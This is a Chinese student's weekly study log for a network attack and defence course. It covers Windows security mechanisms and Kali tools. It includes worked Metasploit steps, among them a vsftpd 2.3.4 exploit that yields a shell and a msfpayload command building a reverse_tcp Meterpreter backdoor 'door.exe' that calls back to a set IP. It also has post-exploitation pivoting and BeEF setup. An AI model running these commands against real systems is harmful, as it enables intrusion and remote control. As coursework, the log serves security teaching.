網絡攻防 第七週學習總結

第6周錯題分析

一、使用Linux命令od -tcx1 Hello.javaod -tc -tcx1 Hello.java能夠ASCII碼和十六進制單字節方法輸出Hello.java的內容。(-b是以八進制輸出)
二、ARP欺騙不能破壞信息的完整性,破壞了信息的可用性。
三、中間人攻擊能夠破壞信息的機密性和完整性。(P140)
四、防火牆部署方式中,包過濾路由器和雙宿主堡壘主機不能實現網絡層和應用層的雙重安全。
五、根據工做的網絡協議層次,防火牆技術中工做網絡層的是包過濾。(電路級網關在傳輸層;應用層代理在應用層;基於狀態檢測的包過濾涉及到傳輸層)
六、網絡安全的動態安全模型的PDR中沒有Policy,它在P2DP模型中。html

教材學習

第七章 Windows操做系統安全防禦

  • Windows操做系統框架
    • Windows操做系統的發展與現狀
      Windows在桌面操做系統中佔有很是高的市場份額,Windows XP系統在國內仍有大量的用戶
    • Windows操做系統基本結構
      一、Windows操做系統內核基本模塊:Windows執行體、Windows內核體、設備驅動程序、硬件抽象層、Windows窗口與圖形界面接口內核實現代碼。
      二、Windows操做系統在用戶態的代碼模塊:系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL。
      三、核心機制:Windows進程和線程管理機制、Windows內存管理機制、Windows文件管理機制、Windows註冊表管理機制、Windows的網絡機制。
      Windows系統的網絡結構,從OSI網絡參考模型的物理層到應用層,各層對應的Windows網絡組件模塊包括:
      ①網卡硬件設備驅動程序,位於OSI物理層
      ②NDIS庫及miniport驅動程序,位於OSI鏈路層
      ③TDI傳輸層,也被稱爲網絡協議驅動,位於OSI網絡層與傳輸層
      ④網絡API DLL 及TDI客戶端,對應OSI會話層與表示層
      ⑥網絡應用程序與服務進程,對應OSI應用層
  • Windows操做系統的安全體系結構與機制
    • Windows安全體系結構
      基於引用監控器(Reference Monitor)模型來實現基本的對象安全模型。最核心的是位於內核中的SRM(Security Reference Monitor)安全引用監控器,以及位於用戶態的LSASS安全服務。
    • Windows身份認證機制
      分爲用戶,用戶組,和計算機三大類。對於每一個安全主體,以時間和空間上都全局惟一的SID安全標識符來進行標識。
      Windows用戶密碼通過加密處理後被保存於SAM或者活動目錄AD中,其中本地用戶帳戶口令信息通過不可逆的128位隨機祕鑰Hash加密後存儲在SAM文件中。
      Windows進程、GINA圖形化登陸窗口,與LSASS服務經過協做來完成本地身份認證過程。
    • Windows受權與訪問控制機制
      Windows受權與訪問控制機制是基於引用監控器模型,由內核中的SRM模塊與用戶態的LSASS服務共同來實施。
      Windows對於系統中全部須要保護的資源都抽象成對象,而對每一個對象會關聯一個SD安全描述符(Security Descriptor)都會關聯一個對象描述符,有如下屬性組成:Owner SID、Group SID、DACL 自主訪問控制列表、SACL 系統審計訪問控制列表。
    • Windows安全審計機制
      系統審計策略在本地安全策略中由系統管理員定義,來肯定系統對哪些事件進行記錄。
    • Windows的其餘安全機制
      Windows安全中心中集成了對於保護Windows系統安全穩定運行最爲關鍵的三項安全措施:防火牆,補丁自動更新,以及病毒防禦。除了安全中心外,Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等。
  • Windows遠程安全攻防技術
    Windows遠程攻擊技術可分爲:遠程口令猜想與破解攻擊、攻擊Windows網絡服務、攻擊Windows客戶端及用戶
    • Windows系統的安全漏洞生命週期
      Windows安全漏洞發現、利用與修補過程
      安全漏洞公開披露信息庫:幾個知名的通用漏洞信息庫:CVE、NVD、SecurityFocus、OSVDB等。
      針對特定目標的滲透測試攻擊過程:①漏洞掃描測試②查找針對發現漏洞的滲透代碼③實施滲透測試
      使用Metasploit軟件實施滲透測試
      Metasploit是徹底開源的滲透測試軟件。採用開發框架和模塊組件的可擴展模型,以Ruby語言編寫的Metasploit Framework(MSF)庫做爲整個軟件的基礎核心,爲滲透測試組件的開發與測試提供平臺;模塊組件是真正實施滲透攻擊的代碼。
      Metasploit提供了CLI、Console、Web和GUI四種不一樣的用戶交互接口,其中Console終端是比較經常使用的方式。
    • Windows遠程口令猜想與破解攻擊
      遠程口令自猜想
      遠程口令字交換通訊竊聽與破解
      遠程口令猜想與破解防範措施
    • Windows網絡服務遠程滲透攻擊
      Windows操做系統默認開放135(TCP),137(UDP),139(TCP)與445(TCP)端口,對應的網絡服務爲MSRPC與過程調用服務,NetBIOS網絡基本輸入輸出系統服務和SMB文件與打印機共享服務。
      針對NetBIOS網絡服務的著名漏洞及攻擊
      針對SMB網絡服務的著名漏洞及攻擊
      針對MSRPC網絡服務的著名漏洞及攻擊
      針對Windows系統上微軟網絡服務的遠程滲透攻擊
      針對Windows系統上第三方網絡服務的遠程滲透攻擊
      網絡服務遠程滲透攻擊防範措施
  • Windows本地安全攻防技術
    • Windows本地特權提高
      終極特權:Administrator或者Local System帳戶。從受限用戶權限嘗試得到特權帳戶的攻擊技術也被稱爲特權提高。
    • Windows敏感信息竊取
      Windows系統口令字密文提取技術
      Windows系統口令字破解技術
      用戶敏感數據竊取
      本地敏感信息竊取防範措施
    • Windows消蹤滅跡
      關閉審計功能
      清理事件日誌
      針對消蹤滅跡的防範措施
    • Windows遠程控制與後門程序
      命令行遠程控制工具
      圖形化遠程控制工具
      針對後門程序防範措施

視頻學習

Kali無線安全分析工具

RFID/NFC工具
java

與之相關的是IC卡的攻擊與破解,飯卡、房卡、水卡均可以成爲攻擊測試的目標。sql

軟件定義無線電
shell

參考網站:http://geekcar.net/archives/7748
藍牙工具集
數據庫

無線網絡分析工具
windows

BackTrack系列曾以此聞名,包括Aircrack-ng無線網絡分析套件等工具瀏覽器

一、Aircrack
Aircrack-ng是一個與802.11標準的無線網絡分析有關的安全軟件,主要功能:網絡偵測、數據包嗅探、WEP和WPA/WPA-2破解。
下載地址:http://www.aircrack-ng.org/安全

二、Cowpatty,一款知名的WPA-PSK握手包密碼破解工具
網絡

三、EAPMD5PASS針對EAPMD5的密碼破解工具
session

四、fern-wifi-cracker有圖形化界面,使用Python寫的
可把外置的無線網卡勾選到Kali下面

五、MDK3,是無線DOS攻擊測試工具,能發起Beacon Flood、Authentication DoS等模式的攻擊,還具備針對
隱藏ESSID的暴力探測模式、802.1X滲透測試、WIDS干擾等功能。

六、wifite,自動無線網審計工具,能夠完成自動化破解。Python腳本編寫,結合Aircrack-ng套件和Reaver工具。

七、Reaver,對開啓WPS的路由器PIN碼進行破解。大部分路由器的WPS都是開啓的。
關於PIN碼破解,參考:http://blog.csdn.net/tinyeyeser/article/details/17127805
BSSID 是指站點的 MAC 地址.

Kali 漏洞利用之檢索與利用

一、searchsploit能夠藉助關鍵詞搜索漏洞信息以及漏洞對應的exp
searchsploit wordpress

列出了漏洞和文件地址
查看列出的文件,例:

二、ikat自動化開啓不一樣的exp。等待目標訪問中招。

三、termineter旨在評估智能電錶的安全性

Kali 漏洞利用之Metasploit基礎

Metasploit在滲透測試中常常被用到。這套軟件包括了不少工具,這些工具組成了一個完整的攻擊框架。

一、啓動服務
在Kali中使用Metasploit,須要先開啓PostgreSQL數據庫服務和metasploit服務,而後就能夠利用msf數據庫查詢exploit和記錄。
二、路徑介紹
Kali中msf的路徑爲/usr/share/metasploit-framework



三、基本命令
msfpayload:用來生成payload或者shellcode。 搜索能夠用msfpayload -l |gre[ "windows"查詢; -o選項能夠列出payload所需的參數。
msfencode:msf中的編碼器,早期用來繞過AV(殺毒軟件),現經常使用msfpayload與它編碼避免exploit的壞字符串。
msfconsole:開啓metasploit的console。
輸入msfconsole,打開msf

四、測試示例:發現漏洞,搜索exploit
nmap -sV 222.28.136.171

能夠看到21端口開放的是ftp服務,用的版本是vsftpd 2.3.4
此版本是否存在漏洞,在msf裏用search vsftpd搜索一下

發現有匹配項

五、測試示例:選擇exploit,查看參數

進入exploit時發生點小問題,檢查以後發現是本身輸入錯誤,改正後正確進入
查看參數,發現RHOST的參數還未設置,接下來爲其設置參數set RHOST 222.28.136.171

六、測試示例:選擇payload

設置好以後,show options查看參數,發現沒有要設置的參數了

八、執行攻擊
輸入exploit便可進行攻擊測試,若是成功,將返回一個shell:

此時可查看id,ip地址,還有一些文件信息等,可獲取目標主機的權限

Kali漏洞利用之Meterpreter介紹


生成Meterpreter後門;打開MSF,開啓監聽(選擇exploit/multi/handler);在目標機器上執行door.exe;
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看本身的IP地址爲222.28.136.234,LHOST、LPORT爲reverse_tcp的參數,能夠在msf裏查看到(記得把服務啓動)*/

use exploit/multi/handler來接收返回的鏈接
設置reverse_tcp的LHOST、LPORT參數

此時執行生成後門的命令

生成了door.exe文件

Kali漏洞利用之Metasploit後滲透測試

在跳板獲取必定權限後須要積極地向內網主機權限發展,獲取指定的目標信息,探查系統漏洞,藉助msf已經獲得的Meterpreter後門,可使系列的操做更容易。

一、查看當前網卡、網段信息(使用ifconfig)。可查看到三個網卡,一個是本地網卡,另外一個是咱們能訪問的網卡,還有一個網卡具備內網IP(訪問不到,能夠ping如下試試)。
二、添加路由表run autoroute -s 10.0.0.1可使用msf中的模塊跨網段攻擊或掃描。可經過腳本autoroute快速添加。
三、開socket代理,經過使用auxiliary/server/socks4a模塊,建立一個socks代理,能夠爲瀏覽器,sqlmap,nmap使用。經過代理便可訪問內網計算機。
四、經過background和session -i能夠自由切換進入session。
五、輸入run能夠看到在meterpreter上能夠作的不少命令。
六、經過run post/能夠看到後滲透測試模塊
七、獲取內網信息run arp_scanner -r 10.0.0.1/24
八、也能夠上傳文件,作端口轉發後進行後續測試,例如upload lcx.exe c:\\傳送文件到c盤根目錄。

Kali漏洞利用之BeeF


一、在命令行下啓動BeeFbeef-xss


二、假設被測試主機因爲XSS漏洞請求到http://127.0.0.1:3000/demos/basic.html

此時頁面左側就會多出一項在線主機:




在此,輸入的是hello world,以下返回成功!

五、Proxy功能(代理功能)
選中目標主機,點右鍵,在菜單中選中Use as Proxy;而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。

六、BeEF默認是不加載Metasploit的,若是要使用Metasploit豐富的攻擊模塊,須要作些配置.
默認:

配置:
首先打開beef xss目錄

cd /usr/share/beef-xss/
ls
nano config.yaml  /* 編輯一下,能夠看到有不少配置信息,包括用戶名、密碼均可以在這設置,在此將Metasploit的false修改成true */
clear


保證此處IP等信息設置正確(不適用127.0.0.1,需使用本機IP),並修改Custom路徑:

cd extensions/metasploit/
ls
nano config.yaml   /* 將host和callback_host行的IP修改成本機IP,並修改custom路徑爲/usr/share/metasploit-framework/ */

配置好後打開msfconsole,運行命令:

load msgrpc ServerHost=222.28.136.234 Pass=abc123

執行./beef -x
從新加載Metasploit的exploit模塊

加載以後,重啓下服務

service beef-xss restart

此時再訪問如下以前的頁面,發現沒法鏈接,稍等片刻,使用默認用戶密碼登陸進去。發現Metasploit下多了許多模塊:

進度

視頻學習(新增/累計) 教材學習 博客量(新增/累計)
目標 34個視頻 12章(網絡攻擊技術與實踐)
第一週 (實驗樓學習) (實驗樓學習) 1/1
第二週 5/5 第一、2章 1/2
第三週 5/10 第3章 1/3
第四周 5/15 第4章 1/4
第五週 5/20 第十一、12章 2/6
第六週 5/25 第五、6章 1/7
第七週 5/30 第7章 1/8
相關文章
相關標籤/搜索